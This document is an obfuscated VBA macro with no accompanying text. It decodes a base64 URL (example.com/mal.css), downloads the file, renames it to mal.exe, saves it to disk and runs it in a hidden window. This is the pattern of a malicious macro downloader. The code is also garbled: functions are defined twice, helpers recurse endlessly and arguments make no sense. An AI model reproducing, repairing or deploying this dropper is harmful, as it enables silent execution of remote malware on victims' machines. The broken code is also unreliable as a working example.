Private Sub O0O000O()
    OOO0OO0 (O0O00OO("aHR0cHM6Ly93d3cuZXhhbXBsZS5jb20vbWFsLmNzcw=="))
End Sub

Private Sub OOO0OO0(ByVal OOO0O00 As String)
    Dim OO0OOO0() As Byte
    OO0OOO0 = O0OOO0O(OOO0O00)
    Dim O00O0OO As String
    O00O0OO = OO0O0OO(OO0OOO0)
    OO0OOOO O00O00O, O00O0OO
    Set O00O00O = CreateObject(OO00OO0(O00O0OO))
    O00O00O.Open "GET", O00O0OO, False
    O00O00O.send
    Dim OOO0000 As Object
    Set OOO0000 = CreateObject(OOO00OO(O00O0OO))
    OOO0000.Open
    OOO0000.Type = 1
    OOO0000.Write O00O00O.responseBody
    OOO0000.SaveToFile O0O0OO0(OO0O0OO(OO0OOO0)), 2
    OOO0000.Close
    OO0OO0O O0OOO00(OO0OOO0)
End Sub

Private Sub OO0OO0O(ByVal O0OO0OO As String)
    Dim OO0O0OO As Object
    Set OO0O0OO = CreateObject(OOO00OO(O0OO0OO))
    OO0O0OO.Run O0O0OO0(O0OO0OO), 0, False
End Sub

Private Function O0O00OO(ByVal OO0OO00 As String) As String
    Dim OO000OO As Object
    Set OO000OO = CreateObject(OO0000O(OO0OO00))
    O0O00OO = OO000OO.createElement(O0O00OO(OO0OO00)).nodetypedvalue
End Function

Private Function OO00OO0(ByVal O0O00OO As String) As String
    Dim OO0OO0O As Object
    Set OO0OO0O = CreateObject(OO0000O(O0O00OO))
    OO00OO0 = OO0OO0O.createElement(OOO0O0O(O0O00OO)).nodetypedvalue
End Function

Private Function OO0O0OO(ByVal O0O0O00 As Byte()) As String
    Dim OO0000O As Object
    Set OO0000O = CreateObject(O0000OO(O0O0O00))
    OO0O0OO = OO0000O.createElement(OO00000(O0O0O00)).nodetypedvalue
End Function

Private Function OOO0OOO(ByVal O0O0O00 As String) As Byte()
    Dim O0O0OO0 As Object
    Dim OOO00O0 As Object
    Set OOO00O0 = CreateObject(OOO00OO(O0O0O00))
    Set O0O0OO0 = OOO00O0.createElement(OO0O0OO(O0O0O00))
    O0O0OO0.DataType = OOO0OO0(O0O0O00)
    O0O0OO0.Text = O0O0O00
    OOO0OOO = O0O0OO0.nodetypedvalue
End Function

Private Function O0O0OO0(ByVal O0O00OO As String) As String
    O0O0OO0 = Replace(O0O00OO, "mal.css", "mal.exe")
End Function

Private Function O0OOO00(ByVal O0O0O00 As Byte()) As String
    Dim OO0000O As Object
    Set OO0000O = CreateObject(O0000OO(O0O0O00))
    O0OOO00 = OO0000O.createElement(OO00000(O0O0O00)).nodetypedvalue
End Function

Private Function OO0O0OO(ByVal O0O0O00 As String) As String
    Dim OO0OO0O As Object
    Set OO0OO0O = CreateObject(OO0000O(O0O0O00))
    OO0O0OO = OO0OO0O.createElement(OOO0O0O(O0O0O00)).nodetypedvalue
End Function

Private Function OO00000(ByVal O0O0O00 As Byte()) As String
    Dim OO0OO00 As Object
    Set OO0OO00 = CreateObject(OO0000O(O0O0O00))
    OO00000 = OO0OO00.createElement(OOO000O(O0O0O00)).nodetypedvalue
End Function

Private Function OO0000O(ByVal O0O0O00 As String) As String
    Dim O00OO0O As Object
    Set O00OO0O = CreateObject(OO0000O(O0O0O00))
    OO0000O = O00OO0O.createElement(OOO000O(O0O0O00)).nodetypedvalue
End Function

Private Function OOO00OO(ByVal O0O0O00 As String) As String
    Dim O0OOO0O As Object
    Set O0OOO0O = CreateObject(OOO000O(O0O0O00))
    OOO00OO = O0OOO0O.createElement(OOO0O0O(O0O0O00)).nodetypedvalue
End Function

Private Function OOO000O(ByVal O0O0O00 As String) As String
    Dim OO0OOO0 As Object
    Set OO0OOO0 = CreateObject(OOO000O(O0O0O00))
    OOO000O = OO0OOO0.createElement(O0O00OO(O0O0O00)).nodetypedvalue
End Function

Private Function OOO0OO0(ByVal O0O0O00 As String) As String
    Dim O00OO0O As Object
    Set O00OO0O = CreateObject(OOO000O(O0O0O00))
    OOO0OO0 = O00OO0O.createElement(O0O00OO(O0O0O00)).nodetypedvalue
End Function

Private Function OO0O0OO(ByVal O0O0O00 As String) As String
    Dim O00OO0O As Object
    Set O00OO0O = CreateObject(OOO000O(O0O0O00))
    OO0O0OO = O00OO0O.createElement(O0O00OO(O0O0O00)).nodetypedvalue
End Function

Private Function OO00OO0(ByVal O0O0O00 As String) As String
    Dim OO0OO0O As Object
    Set OO0OO0O = CreateObject(OOO000O(O0O0O00))
    OO00OO0 = OO0OO0O.createElement(OOO0O0O(O0O0O00)).nodetypedvalue
End Function

Private Function O0O00OO(ByVal O0O0O00 As String) As String
    Dim OO0OOO0 As Object
    Set OO0OOO0 = CreateObject(OOO000O(O0O0O00))
    O0O00OO = OO0OOO0.createElement(OOO000O(O0O0O00)).nodetypedvalue
End Function
